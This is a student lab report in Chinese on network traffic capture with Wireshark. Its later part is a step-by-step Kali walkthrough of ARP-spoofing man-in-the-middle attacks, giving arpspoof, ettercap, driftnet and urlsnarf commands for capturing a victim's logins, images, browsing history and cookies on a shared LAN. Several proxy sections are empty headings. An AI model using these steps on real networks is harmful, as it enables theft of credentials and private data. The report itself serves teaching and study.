实验一网络流量捕获实验

1 被动网络流量捕获

1.1 数据抓包工具——Wireshark

1.1.1软件概述（略）

1.1.2工作流程（略）

1.1.3抓包原理

1.网络原理（哪种网络情况能够抓到包？）

（1）本机环境：直接抓包本机网卡进出的流量。

如下图所示，在本机安装Wireshark，绑定网卡，不需要借助交换机、集线器、路由器等第三方设备，抓取本机电脑网卡上进出的流量，这是一种最基本的抓包方式。

（2）集线器环境：流量防洪，同一冲突域，集线器会做防洪，用户连接到同一集线器是同一冲突域。

如下图所示，三台电脑PC1、PC2、PC3通信，PC1装有Wireshark，三台电脑连接到同一台集线器，集线器属于物理层产品，看不懂MAC地址和IP地址，处理方式对除了接受包的源端口的其他所有端口防洪，可以抓到同一集线器其他电脑发送过来的数据包，这是一种比较典型的被淘汰的老网络拓扑结构。

（3）交换机环境

①端口镜像

交换机属于链路层产品，转发数据包完全按照MAC地址表，PC2和PC3通信，一般情况PC1很难抓到他们之间的数据包，但可以在交换机做端口镜像（SPAN）策略，复制一份到PC1，并将PC1的网卡设置为混杂模式，就可以抓取数据包了。

②ARP欺骗

PC1、PC2之间通信，PC2向集线器发送IP请求（广播包），交换机接收到数据包并发送给PC1和PC3，正常情况下，PC1会丢弃该包，所以就只有PC3可以与PC2建立连接。但PC1做ARP欺骗，并不断向集线器发送包，就可以毒化PC2的ARP表，就会绑定PC1的MAC地址，以后PC2想与PC3通信，就要经过PC1，再由PC1决定是否将数据包发给PC3。

③MAC泛洪

PC1泛洪大量垃圾包，产生大量MAC地址，集线器的MAC表爆表，就会把其他电脑发出的MAC地址的包挤出去，按照交换机的处理原理，对于接受到未知帧的数据包，会对外流量泛洪，PC1就可以抓取数据包了。

2.底层原理（抓包的底层结构是怎样的？）

自顶向下依次为GTK1/2、Core、Wiretap、Capture、Win-/libpcap。

l GTK1/2：图像处理工具，处理用户的输入输出显示。

l Core：核心引擎，通过函数调用将其他模块连接在一起，起到联动调度的作用。

l Wiretap：格式支持，从抓包文件中读取数据包，支持多种文件格式。

l Capture：捕包引擎，利用libpcap/WinPcap从底层抓取网络数据包，libcap/WinPcap提供了通用的抓包接口，能从不同类型的网络接口（包以太网，令牌环网，ATM网等）获取数据包。

l Win-/libpcap：Wireshark抓包时依赖的库文件。

1.1.4Wireshark和被动捕获的优点与缺点（略）

1.2 捕获数据与分析数据

（1）点击运行Wireshark，初始界面如下图，本机选择WLAN网卡捕获数据；

（2）在开始捕获数据之前，为了实验，分析数据的准确性，关闭所有一些不相关应用程序，此处，以访问网页为例，捕获浏览器上的数据包；

（3）停止捕获，在过滤栏输入HTTP，便可以查看浏览器网页下的数据包，通过特定的关键字GET，在预设的环境下，我们不难找到我们所需要的信息，从下图，可以找到用户的账号、密码和验证码，可见该网站的安全性非常低，连基本的加密机制都没有。

（4）其他测试数据（如QQ音乐），可以捕获到一堆cookie值，但很显然QQ对密码是进行过加密处理。

2 主动网络流量捕获

2.1 网络代理

（1）端口转发代理

（2）基本原理

（3）其优点和缺点

l 端口转发代理的优点：

l 端口转发代理的缺点：

2.2 SOCKS代理

（2）基本原理

（3）其优点和缺点

l SOCKS代理的优点：

l SOCKS代理的缺点：

2.3 HTTP代理

2.3.1 转发HTTP代理

（1）基本原理

（2）其优缺点

l 转发HTTP代理优点：

l 转发HTTP代理缺点：

2.3.2 反向HTTP代理

（1）基本原理

（2）其优缺点

l 反向HTTP代理优点：

l 反向HTTP代理缺点：

2.4 KALI使用ETTERCAP实现ARP欺骗

实验环境：Kali

使用的工具：ettercap

① 安装ettercap ，一般kali内已安装

sudo apt-get installettercap-text-only

sudo apt-get installdriftnet

② 扫描该网络端口上的设备信息

nmap -sP 192.168.1.1-255

③ 使被检测的设备上的数据流量不被截断，避免被检测的设备上不了网

echo 1 >/proc/sys/net/ipv4/ip_forward

④ 检测IP地址为192.168.1.104的设备

arpspoof -i eth0 -t192.168.1.104 192.168.1.1

⑤ 开始检测设备信息，抓取该设备上的数据包

ettercap -Tq -i eth0

以上方式就可以通过ARP欺骗，在同一无线路由器下抓取他人流量，上面的实验可以自动抓取到受害者在网站上用户名和密码。

因为之前的这个实验在虚拟机上，kali无法使用主机WiFi，需要外置的USB网卡，尽管将其网络设置为桥接模式下，实验效果仍不明显，所以在购置了一个网卡后，进行了之后的抓取同一局域网下用户的网上浏览信息的实验。

①
终端输入ifconfig，查看网络信息

② 终端输入echo 1 >/proc/sys/net/ipv4/ip_forward进行ip转发，保证受害者能正常上网

③ 终端输入zenmap，Target设置为受害者IP地址（我的手机），之后点击Scan

④ 再打开一个终端，输入ettercap -G，在Sniff选项中选择Unified sniffing

⑤ 选择网卡wlan0

⑥ 在Hosts选项中选择Scanfor hosts扫描主机后，再选择Hosts list获取主机列表

⑦ 将受害者的IP Add to Target 1，将路由器的IP Add to Target 2

⑧ 在Mitm选项中选择ARP poisoning，设置中间人，插入第三者

⑨ 选择Sniff remote connectins，点击确定

⑩ 在Start选项中选择Startsniffing 开始嗅探

⑪ 再打开一个终端，输入driftnet -I wlan0，获取受害者浏览的图片

⑫ 再打开一个终端，输入urlsnarf -i wlan0 监听受害者浏览过的网页日志，获取受害者浏览的网页日志

另外，ettercap也可以获取cookie,导入谷歌浏览器即可免密码进入网页。由于时间，后面的就没有继续深入实验了。